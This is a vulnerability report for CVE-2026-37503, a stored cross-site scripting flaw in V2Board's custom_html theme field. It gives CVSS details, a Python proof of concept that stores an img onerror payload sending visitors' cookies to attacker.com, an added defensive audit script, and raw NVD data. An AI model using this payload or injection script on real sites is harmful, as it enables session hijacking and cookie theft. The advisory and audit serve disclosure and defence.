Security Vulnerability Report
CVE-2026-37503 CVSS 6.9 MEDIUM

Published: 2026-05-01 16:16:30
Last Modified: 2026-05-11 19:22:57

Description

Cross-Site Scripting (XSS) in V2Board through 1.7.4. The custom_html field of the theme configuration is rendered with Blade's unescaped output syntax ({!! ... !!}) in public/theme/v2board/dashboard.blade.php, so whatever is stored there reaches each visitor's browser verbatim. An administrator can store arbitrary HTML and JavaScript in that field via the saveThemeConfig API; all site visitors then execute the payload, enabling cookie theft, session hijacking, or phishing. Because administrator privileges are required, the realistic threat is a compromised or malicious admin account turning a configuration field into a persistent, site-wide stored XSS.

CVSS Details

CVSS Score
6.9 (secondary assessment from the reporting source; the vector below is this one)
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N
NVD Primary Assessment
4.8 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N (NVD rates confidentiality impact Low rather than High). Both vectors agree on the parts that matter for triage: high privileges (an admin account) are required, a visitor has to load the affected page, and scope is Changed because the payload runs in visitors' browsers rather than in the vulnerable server component.
Weakness
CWE-79 (Improper Neutralization of Input During Web Page Generation)

Configurations (Affected Products)

cpe:2.3:a:v2board:v2board:*:*:*:*:*:*:*:* - VULNERABLE
V2Board <= 1.7.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target API endpoint (path as given in the published PoC)
url = "https://target-site.com/api/v1/admin/theme/saveConfig"

# Malicious XSS payload: the broken image fires onerror, which exfiltrates the
# visitor's cookies to an attacker-controlled host. Only cookies without the
# HttpOnly flag are readable from document.cookie.
xss_payload = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'

# Request headers with admin authorization: the flaw needs a valid
# administrator token (CVSS PR:H)
headers = {
    "Authorization": "Bearer <ADMIN_ACCESS_TOKEN>",
    "Content-Type": "application/json",
}

# Payload data to be saved in the theme config
payload_data = {"custom_html": xss_payload}

try:
    # Send the POST request to store the payload; it is served unescaped
    # to every visitor from then on
    response = requests.post(url, json=payload_data, headers=headers, timeout=10)
    if response.status_code == 200:
        print("[+] Payload injected successfully!")
    else:
        print(f"[-] Injection failed with status code: {response.status_code}")
except requests.RequestException as e:
    print(f"Error: {e}")
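The example below is added here and is not V2Board's or the PoC author's code. It models, in Python, the difference between Blade's escaped ({{ }}) and unescaped ({!! !!}) output that the description hinges on, and uses the standard-library HTML parser to triage a stored custom_html value for script-capable markup, the check an incident responder would run against the theme configuration of a suspect install. The wrapping div markup, the sample strings and the indicator lists are assumptions for illustration; the payload string is the one from the PoC above.

```python
"""Added example, not V2Board code: model the two Blade output modes and
triage a stored custom_html value for script-capable markup.

Blade's {{ $x }} runs the value through Laravel's e() helper, which is
htmlspecialchars() with ENT_QUOTES, while {!! $x !!} emits it verbatim.
html.escape(quote=True) encodes the same five characters (& < > " '), so
it stands in for e() here. The wrapping <div> is an assumption for
illustration, not the real dashboard markup.
"""
import html
from html.parser import HTMLParser

# Constructed sample: the payload used in the PoC above.
POC_PAYLOAD = '<img src=x onerror=fetch("https://attacker.com/steal?c="+document.cookie)>'

# Constructed sample: the kind of content the feature is meant to carry.
BENIGN_HTML = '<p class="notice">Maintenance window: Sunday 02:00 UTC</p>'


def render_unescaped(custom_html: str) -> str:
    """Model of {!! $custom_html !!}: the stored string lands in the page as markup."""
    return f'<div id="custom-html">{custom_html}</div>'


def render_escaped(custom_html: str) -> str:
    """Model of {{ $custom_html }}: the browser shows the string as text, not markup."""
    return f'<div id="custom-html">{html.escape(custom_html, quote=True)}</div>'


# Elements that can run script or change where the page loads resources from
# (assumed indicator list, not exhaustive).
ACTIVE_TAGS = {"script", "iframe", "object", "embed", "svg", "math",
               "base", "meta", "link", "form"}
# Attributes whose value is a URL and may carry a script-executing scheme.
URL_ATTRS = {"src", "href", "action", "formaction", "data", "xlink:href"}
SCRIPT_SCHEMES = ("javascript:", "vbscript:", "data:")


def _normalize_url(value: str) -> str:
    # Browsers ignore ASCII whitespace and control characters while parsing the
    # scheme, so "  Java\nScript:" still executes; strip them before matching.
    return "".join(ch for ch in value if ord(ch) > 0x20).lower()


class ActiveContentAuditor(HTMLParser):
    """Collects indicators of active content in admin-supplied HTML.

    This is a triage aid for reviewing what an administrator stored, not a
    sanitizer: an allowlist-based HTML purifier is the right tool for output.
    HTMLParser lowercases tag and attribute names and decodes character
    references in attribute values, so obfuscated handlers are normalized.
    """

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.findings: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag in ACTIVE_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            if name.startswith("on"):
                self.findings.append(f"<{tag}> has event handler {name}")
            elif name in URL_ATTRS and value and _normalize_url(value).startswith(SCRIPT_SCHEMES):
                self.findings.append(f"<{tag}> {name} uses a script-capable URL scheme")


def audit_custom_html(custom_html: str) -> list[str]:
    """Return the active-content findings for one stored custom_html value."""
    auditor = ActiveContentAuditor()
    auditor.feed(custom_html)
    auditor.close()
    return auditor.findings


if __name__ == "__main__":
    for label, value in (("PoC payload", POC_PAYLOAD), ("benign", BENIGN_HTML)):
        print(f"--- {label}")
        print("unescaped:", render_unescaped(value))
        print("escaped:  ", render_escaped(value))
        print("findings: ", audit_custom_html(value) or "none")
```

Run against the PoC payload, render_unescaped() emits the img element intact, render_escaped() turns it into inert text, and audit_custom_html() reports the onerror handler; the benign notice produces no findings either way. Note that escaping defeats the feature (custom_html exists to carry markup), so the audit is the check to apply to existing deployments, while a real fix has to choose between escaping and an allowlist sanitizer.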

References

https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9 (Exploit, Third Party Advisory)
https://github.com/v2board/v2board (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-37503", "sourceIdentifier": "[email protected]", "published": "2026-05-01T16:16:30.490", "lastModified": "2026-05-11T19:22:57.067", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Scripting (XSS) in V2Board thru 1.7.4. The custom_html field in theme configuration is rendered using Blade unescaped output in public/theme/v2board/dashboard.blade.php. An admin can inject arbitrary JavaScript via the saveThemeConfig API. All site visitors execute the payload, enabling cookie theft, session hijacking, or phishing."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:N", "baseScore": 6.9, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 4.7}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N", "baseScore": 4.8, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.7, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:v2board:v2board:*:*:*:*:*:*:*:*", "versionEndIncluding": "1.7.4", "matchCriteriaId": "5514969D-29B0-4D10-A1F8-11154F0BCAF6"}]}]}], "references": [{"url": 
"https://gist.github.com/sgInnora/1330e1a82caa79906eec55eeff2c99b9", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://github.com/v2board/v2board", "source": "[email protected]", "tags": ["Product"]}]}}